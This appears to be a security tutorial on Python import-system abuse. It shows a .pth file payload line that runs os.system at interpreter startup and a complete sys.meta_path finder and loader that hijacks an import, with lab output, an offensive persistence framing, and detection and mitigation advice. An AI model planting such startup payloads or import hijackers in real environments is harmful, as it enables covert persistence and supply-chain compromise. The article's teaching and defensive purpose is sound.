PyFu

Import System Abuse with .pth Files and sys.meta_path

Python-based Vulnerabilities Anatomy

Python’s import system is far more programmable than the import statement suggests, and that programmability is an attack surface in its own right. Two mechanisms in particular let an attacker run code without ever being explicitly imported: .pth files, which execute lines at interpreter startup, and sys.meta_path, which lets you insert a finder that intercepts every import in the process. The first is a persistence and supply-chain primitive; the second is a runtime hijacking primitive. Both abuse documented, intended features of CPython, which is exactly why they are quiet.

How CPython resolves an import

When you write import foo, the interpreter walks sys.meta_path, a list of finder objects, asking each one “can you locate foo?”. The default finders handle built-in modules, frozen modules, and path-based lookup across sys.path. The first finder that returns a spec wins, and its loader is asked to execute the module. The key insight for an attacker is that sys.meta_path is an ordinary, writable Python list: anything you put at the front of it is consulted before the real finders, on every import for the rest of the process’s life.

sys.path itself is assembled at startup, and part of that assembly is the site module processing .pth files, which is where the first technique lives.

Technique 1: weaponizing .pth files

A .pth file in a site-packages directory is normally a plain list of extra directories to add to sys.path. But the site module has a special, long-standing behavior: any line in a .pth file that begins with import is executed as Python code at interpreter startup. That single feature turns a text file dropped into site-packages into code execution on every single python invocation.

# evil.pth, dropped into site-packages/
import os; os.system('id > /tmp/pth-pwned')

The line looks like an import, so it satisfies the .pth format, but the ; os.system(...) after it runs arbitrary code. Because site is imported automatically before your script’s first line, the payload fires before the target program does anything, with no entry in the program’s own source and nothing to see in its imports.

This is the mechanism behind persistent code execution on pip install: a malicious package’s build or install step writes a .pth into site-packages, and from then on every Python process in that environment runs the attacker’s line. It is also a clean local persistence trick: write one file, get executed by every future interpreter that uses that environment. See Python Packages and Python Virtual Environment for where these directories live and how environments isolate (or fail to isolate) them.

Detection is straightforward once you know to look: enumerate every .pth file under your site-packages directories and flag any line that is not simply a path. Defenders rarely audit .pth contents, which is what makes this durable.

Technique 2: hijacking imports through sys.meta_path

Where .pth gives you startup execution, a sys.meta_path finder gives you control over what a running program receives when it imports a name. You write a finder that claims a target module, and your loader hands back code of your choosing, so the victim’s import requests (or any module) returns your trojaned version instead of the real one.

import sys
from importlib.abc import MetaPathFinder, Loader
from importlib.util import spec_from_loader

class HijackLoader(Loader):
    def __init__(self, target):
        self.target = target

    def create_module(self, spec):
        return None  # use a normal module object

    def exec_module(self, module):
        # Attacker-controlled code runs as the imported module's body
        import os
        os.system('id > /tmp/meta-pwned')
        module.hijacked = True

class HijackFinder(MetaPathFinder):
    def __init__(self, target):
        self.target = target

    def find_spec(self, fullname, path, target=None):
        if fullname == self.target:
            return spec_from_loader(fullname, HijackLoader(self.target))
        return None  # let the real finders handle everything else

# Insert at the FRONT so it is consulted before the real finders
sys.meta_path.insert(0, HijackFinder('config'))

import config            # triggers HijackLoader.exec_module
print(config.hijacked)   # True

find_spec returns a spec only for the targeted name and None for everything else, so all other imports behave normally and nothing looks broken. When the program imports the targeted module, exec_module runs the attacker’s code as that module’s body. In a running process where you already have code execution (a deserialization gadget, an exec foothold), installing a meta-path finder is a powerful way to backdoor a future import that has not happened yet, intercepting a security-relevant module the moment the application loads it.

What defenders should watch

Both techniques live in trusted, writable locations. For .pth, the control is integrity of site-packages: install only audited packages, review .pth files (any non-path line is suspicious), and prefer environments you can rebuild from a locked manifest. For sys.meta_path, the indicator is the list itself, snapshot sys.meta_path and sys.path_hooks early and alert on unexpected entries, since a legitimate application almost never prepends a custom finder at runtime.

Tested on CPython 3.12.3. The takeaway: import resolution is user-programmable, so “the code never imports anything dangerous” is not a security property. A .pth line executes before the program starts, and a sys.meta_path finder decides what every future import returns. Runnable demonstrations are in generic-py-fu/import-abuse/ in the lab.

Running it in the lab

docker compose run --rm generic-py-fu python3 import-abuse/meta-path-hijack.py
=== sys.meta_path import hijack ===
meta_path entries before: 3
meta_path entries after insert: 4

Triggering: import config
[HijackFinder] claiming import of 'config'
[HijackLoader] exec_module running as body of 'config'

Proof of hijack:
  config.hijacked = True
  config.note     = this module object was supplied by the attacker's loader
Unaffected import still works: json.dumps({'ok': True}) -> {"ok": true}

Inserting a finder at the front of sys.meta_path intercepted import config and returned an attacker-built module, while unrelated imports passed through untouched.

Why import system abuse matters from an offensive security perspective

I reach for these techniques when I already have a foothold and want to keep it, or when I am attacking the supply chain rather than the running app. A .pth line buys me execution on every future interpreter in the environment with one dropped file and zero footprint in the program’s source; a sys.meta_path finder lets me decide what a running process receives the next time it imports a security-relevant module. Both abuse documented, intended CPython behavior, so they survive upgrades and rarely trip the controls a team has actually deployed. That quietness is the whole value: persistence and hijacking that look like ordinary packaging.

The reason this is a supply-chain favorite is that the .pth execution fires before the program’s first line, so it backdoors pip install itself, and the meta-path finder backdoors imports that have not happened yet. Defenders almost never audit either, which is exactly why I do.

When I assess a Python environment, these are the tells I look for:

  • Non-path lines in .pth files. Any line under site-packages that begins with import (or carries a ; and a call) is code execution at startup, not a path entry. This is the single highest-value thing to enumerate.
  • sys.meta_path.insert(0, ...) or appends at runtime. A legitimate application almost never prepends a custom finder; an entry that was not there at a clean startup is a hijack indicator.
  • Writable site-packages or sys.path entries owned by the runtime user. Anything droppable there executes, so a world-writable or upload-reachable package directory is the precondition for both techniques.
  • MetaPathFinder/Loader subclasses and spec_from_loader in application code. Custom import machinery is rare in normal apps and worth reading whenever it appears.
  • Shadowing modules. A local config.py or similarly named file that masks an expected import is the low-tech cousin of the meta-path hijack.

For defenders the takeaway is that “the code never imports anything dangerous” is not a security property: import resolution is user-programmable, so the control is integrity of every location Python loads from, not review of the application’s own imports.

Mitigation

The fix is to control who can write to anything Python imports from: site-packages, the .pth files inside it, and every directory on sys.path must be writable only by trusted accounts and never by the application’s runtime user or by an upload path, because anything droppable there executes at interpreter startup. Install dependencies from pinned, hash-verified sources, run the application as a user that cannot modify its own package directories, and monitor those locations for unexpected .pth files or shadowing modules as a tampering signal.